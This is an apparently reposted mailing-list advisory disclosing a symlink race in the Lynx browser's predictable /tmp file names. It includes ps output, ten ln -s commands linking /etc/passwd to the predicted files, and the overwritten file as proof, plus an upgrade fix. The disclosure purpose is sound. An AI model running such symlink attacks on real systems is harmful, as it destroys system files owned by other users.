---

Security hole in Lynx

Juan Diego Bolanos posted to BUGRAQ:

Subject: Lynx /tmp problem

Hello....

I have found a bug in Lynx all versions, except the latest stable
release...

lynx create temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

if i run lynx like any user, for example root we see this

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

if i make a symlink
from all of this files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

for example i got this in my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


like you see, the file is lost now...

this bug is lynx specific, so all OS are vulnerables..

Fix, upgrade to the latest lynx version, i have checked it, and it appear
to use a L[proc num]-xTMP.html where x is from 0 to ???...

i hope it is already fixed, creating 100 symlinks are not to hard :)

the lynx team know this yet.

by...


Juan Diego

Lynx’s homepage is http://lynx.browser.org -lt ed